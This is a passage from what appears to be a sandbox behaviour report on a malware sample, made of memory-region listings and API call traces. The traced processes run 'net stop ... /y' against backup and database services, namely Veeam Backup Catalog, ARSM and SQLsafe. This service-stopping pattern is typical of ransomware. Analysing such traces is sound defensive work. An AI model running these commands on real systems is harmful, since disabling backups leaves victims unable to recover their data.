"netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4715 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4716 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4717 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4718 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4719 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4720 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4721 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4722 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4723 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4725 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 468 os_tid = 0x1080 [0088.088] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f870 | out: lpSystemTimeAsFileTime=0x18f870*(dwLowDateTime=0xe9ac1730, dwHighDateTime=0x1d48689)) [0088.088] GetCurrentProcessId () returned 0x107c [0088.088] GetCurrentThreadId () returned 0x1080 [0088.088] GetTickCount () returned 0x1fdfd [0088.088] QueryPerformanceCounter (in: lpPerformanceCount=0x18f878 | out: lpPerformanceCount=0x18f878*=1813500700000) returned 1 [0088.090] GetModuleHandleW (lpModuleName=0x0) returned 0xfffd0000 [0088.090] __set_app_type (_Type=0x1) [0088.090] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfffe9c9c) returned 0x0 [0088.090] __getmainargs (in: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788, _DoWildCard=0, _StartInfo=0xffff479c | out: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788) returned 0 [0088.090] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.091] GetConsoleOutputCP () returned 0x1b5 [0088.091] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffffcec0 | out: lpCPInfo=0xffffcec0) returned 1 [0088.091] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0088.093] sprintf_s (in: _DstBuf=0x18f818, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0088.093] setlocale (category=0, locale=".437") returned="English_United States.437" [0088.095] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0088.095] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0088.095] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Veeam Backup Catalog Data Service\" /y" [0088.095] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f5b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0088.095] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0088.095] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f808 | out: Buffer=0x18f808*=0x27c120) returned 0x0 [0088.095] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f808 | out: Buffer=0x18f808*=0x27c140) returned 0x0 [0088.095] _fileno (_File=0x7fefdba2a80) returned 0 [0088.095] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0088.096] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0088.096] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0088.096] _wcsicmp (_String1="config", _String2="stop") returned -16 [0088.096] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0088.096] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0088.096] _wcsicmp (_String1="file", _String2="stop") returned -13 [0088.096] _wcsicmp (_String1="files", _String2="stop") returned -13 [0088.096] _wcsicmp (_String1="group", _String2="stop") returned -12 [0088.096] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0088.096] _wcsicmp (_String1="help", _String2="stop") returned -11 [0088.096] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0088.096] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0088.096] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0088.096] _wcsicmp (_String1="session", _String2="stop") returned -15 [0088.096] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0088.096] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0088.096] _wcsicmp (_String1="share", _String2="stop") returned -12 [0088.096] _wcsicmp (_String1="start", _String2="stop") returned -14 [0088.096] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0088.096] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0088.096] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0088.096] _wcsicmp (_String1="accounts", _String2="Veeam Backup Catalog Data Service") returned -21 [0088.096] _wcsicmp (_String1="computer", _String2="Veeam Backup Catalog Data Service") returned -19 [0088.096] _wcsicmp (_String1="config", _String2="Veeam Backup Catalog Data Service") returned -19 [0088.096] _wcsicmp (_String1="continue", _String2="Veeam Backup Catalog Data Service") returned -19 [0088.096] _wcsicmp (_String1="cont", _String2="Veeam Backup Catalog Data Service") returned -19 [0088.096] _wcsicmp (_String1="file", _String2="Veeam Backup Catalog Data Service") returned -16 [0088.097] _wcsicmp (_String1="files", _String2="Veeam Backup Catalog Data Service") returned -16 [0088.097] _wcsicmp (_String1="group", _String2="Veeam Backup Catalog Data Service") returned -15 [0088.097] _wcsicmp (_String1="groups", _String2="Veeam Backup Catalog Data Service") returned -15 [0088.097] _wcsicmp (_String1="help", _String2="Veeam Backup Catalog Data Service") returned -14 [0088.097] _wcsicmp (_String1="helpmsg", _String2="Veeam Backup Catalog Data Service") returned -14 [0088.097] _wcsicmp (_String1="localgroup", _String2="Veeam Backup Catalog Data Service") returned -10 [0088.097] _wcsicmp (_String1="pause", _String2="Veeam Backup Catalog Data Service") returned -6 [0088.097] _wcsicmp (_String1="session", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.097] _wcsicmp (_String1="sessions", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.097] _wcsicmp (_String1="sess", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.097] _wcsicmp (_String1="share", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.097] _wcsicmp (_String1="start", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.097] _wcsicmp (_String1="stats", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.097] _wcsicmp (_String1="statistics", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.097] _wcsicmp (_String1="stop", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.097] _wcsicmp (_String1="time", _String2="Veeam Backup Catalog Data Service") returned -2 [0088.097] _wcsicmp (_String1="user", _String2="Veeam Backup Catalog Data Service") returned -1 [0088.097] _wcsicmp (_String1="users", _String2="Veeam Backup Catalog Data Service") returned -1 [0088.097] _wcsicmp (_String1="msg", _String2="Veeam Backup Catalog Data Service") returned -9 [0088.097] _wcsicmp (_String1="messenger", _String2="Veeam Backup Catalog Data Service") returned -9 [0088.097] _wcsicmp (_String1="receiver", _String2="Veeam Backup Catalog Data Service") returned -4 [0088.097] _wcsicmp (_String1="rcv", _String2="Veeam Backup Catalog Data Service") returned -4 [0088.097] _wcsicmp (_String1="netpopup", _String2="Veeam Backup Catalog Data Service") returned -8 [0088.097] _wcsicmp (_String1="redirector", _String2="Veeam Backup Catalog Data Service") returned -4 [0088.097] _wcsicmp (_String1="redir", _String2="Veeam Backup Catalog Data Service") returned -4 [0088.097] _wcsicmp (_String1="rdr", _String2="Veeam Backup Catalog Data Service") returned -4 [0088.097] _wcsicmp (_String1="workstation", _String2="Veeam Backup Catalog Data Service") returned 1 [0088.097] _wcsicmp (_String1="work", _String2="Veeam Backup Catalog Data Service") returned 1 [0088.097] _wcsicmp (_String1="wksta", _String2="Veeam Backup Catalog Data Service") returned 1 [0088.097] _wcsicmp (_String1="prdr", _String2="Veeam Backup Catalog Data Service") returned -6 [0088.097] _wcsicmp (_String1="devrdr", _String2="Veeam Backup Catalog Data Service") returned -18 [0088.097] _wcsicmp (_String1="lanmanworkstation", _String2="Veeam Backup Catalog Data Service") returned -10 [0088.097] _wcsicmp (_String1="server", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.097] _wcsicmp (_String1="svr", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.097] _wcsicmp (_String1="srv", _String2="Veeam Backup Catalog Data Service") returned -3 [0088.098] _wcsicmp (_String1="lanmanserver", _String2="Veeam Backup Catalog Data Service") returned -10 [0088.098] _wcsicmp (_String1="alerter", _String2="Veeam Backup Catalog Data Service") returned -21 [0088.098] _wcsicmp (_String1="netlogon", _String2="Veeam Backup Catalog Data Service") returned -8 [0088.098] _wcsupr (in: _String="Veeam Backup Catalog Data Service" | out: _String="VEEAM BACKUP CATALOG DATA SERVICE") returned="VEEAM BACKUP CATALOG DATA SERVICE" [0088.098] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x27ce50 [0088.249] GetServiceKeyNameW (in: hSCManager=0x27ce50, lpDisplayName="VEEAM BACKUP CATALOG DATA SERVICE", lpServiceName=0xffff5750, lpcchBuffer=0x18f728 | out: lpServiceName="", lpcchBuffer=0x18f728) returned 0 [0088.250] _wcsicmp (_String1="msg", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -9 [0088.250] _wcsicmp (_String1="messenger", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -9 [0088.250] _wcsicmp (_String1="receiver", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -4 [0088.250] _wcsicmp (_String1="rcv", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -4 [0088.250] _wcsicmp (_String1="redirector", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -4 [0088.250] _wcsicmp (_String1="redir", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -4 [0088.250] _wcsicmp (_String1="rdr", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -4 [0088.250] _wcsicmp (_String1="workstation", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned 1 [0088.250] _wcsicmp (_String1="work", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned 1 [0088.250] _wcsicmp (_String1="wksta", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned 1 [0088.250] _wcsicmp (_String1="prdr", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -6 [0088.250] _wcsicmp (_String1="devrdr", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -18 [0088.250] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -10 [0088.250] _wcsicmp (_String1="server", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -3 [0088.250] _wcsicmp (_String1="svr", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -3 [0088.250] _wcsicmp (_String1="srv", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -3 [0088.250] _wcsicmp (_String1="lanmanserver", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -10 [0088.250] _wcsicmp (_String1="alerter", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -21 [0088.250] _wcsicmp (_String1="netlogon", _String2="VEEAM BACKUP CATALOG DATA SERVICE") returned -8 [0088.250] NetServiceControl (in: servername=0x0, service="VEEAM BACKUP CATALOG DATA SERVICE", opcode=0x0, arg=0x0, bufptr=0x18f730 | out: bufptr=0x18f730) returned 0x889 [0088.251] wcscpy_s (in: _Destination=0xffff80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0088.251] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0088.252] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0088.254] GetFileType (hFile=0xb) returned 0x2 [0088.254] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f5f8 | out: lpMode=0x18f5f8) returned 1 [0088.254] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f5f0, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x18f5f0*=0x1e) returned 1 [0088.254] GetFileType (hFile=0xb) returned 0x2 [0088.255] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f5f8 | out: lpMode=0x18f5f8) returned 1 [0088.255] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f5f0, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x18f5f0*=0x2) returned 1 [0088.255] _ultow (in: _Dest=0x889, _Radix=1635936 | out: _Dest=0x889) returned="2185" [0088.255] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0088.255] GetFileType (hFile=0xb) returned 0x2 [0088.256] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f5f8 | out: lpMode=0x18f5f8) returned 1 [0088.256] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f5f0, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x18f5f0*=0x34) returned 1 [0088.256] GetFileType (hFile=0xb) returned 0x2 [0088.256] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f5f8 | out: lpMode=0x18f5f8) returned 1 [0088.257] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f5f0, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x18f5f0*=0x2) returned 1 [0088.257] NetApiBufferFree (Buffer=0x27c120) returned 0x0 [0088.257] NetApiBufferFree (Buffer=0x27c140) returned 0x0 [0088.257] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Veeam Backup Catalog Data Service\" /y" [0088.257] exit (_Code=2) Process: id = "87" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x20837000" os_pid = "0x10b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop ARSM /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4726 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4727 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4728 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4729 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 4730 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4731 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4732 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4733 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4734 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4735 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4736 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4737 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4776 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4777 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4778 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 477 os_tid = 0x10bc Process: id = "88" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6cf22000" os_pid = "0x10c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "74" os_parent_pid = "0xcb8" cmd_line = "C:\\Windows\\system32\\net1 stop \"SQLsafe Filter Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4738 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4739 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4740 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4741 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4742 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4743 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4744 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4745 start_va = 0xfff90000 end_va = 0xfffc2fff entry_point = 0xfff90000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4746 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4747 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4748 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4749 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 4750 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4751 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4752 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4753 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4754 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4755 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4756 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4757 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 4758 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4759 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4760 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4761 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4762 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4763 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4764 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4765 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4766 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4767 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4768 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4769 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4770 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4771 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4772 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4773 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4774 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4775 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4779 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 478 os_tid = 0x10c4 [0088.429] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fcd0 | out: lpSystemTimeAsFileTime=0x28fcd0*(dwLowDateTime=0xe9e07570, dwHighDateTime=0x1d48689)) [0088.429] GetCurrentProcessId () returned 0x10c0 [0088.429] GetCurrentThreadId () returned 0x10c4 [0088.429] GetTickCount () returned 0x1ff54 [0088.429] QueryPerformanceCounter (in: lpPerformanceCount=0x28fcd8 | out: lpPerformanceCount=0x28fcd8*=1813534700000) returned 1 [0088.431] GetModuleHandleW (lpModuleName=0x0) returned 0xfff90000 [0088.431] __set_app_type (_Type=0x1) [0088.431] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfffa9c9c) returned 0x0 [0088.431] __getmainargs (in: _Argc=0xfffb4780, _Argv=0xfffb4790, _Env=0xfffb4788, _DoWildCard=0, _StartInfo=0xfffb479c | out: _Argc=0xfffb4780, _Argv=0xfffb4790, _Env=0xfffb4788) returned 0 [0088.431] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.431] GetConsoleOutputCP () returned 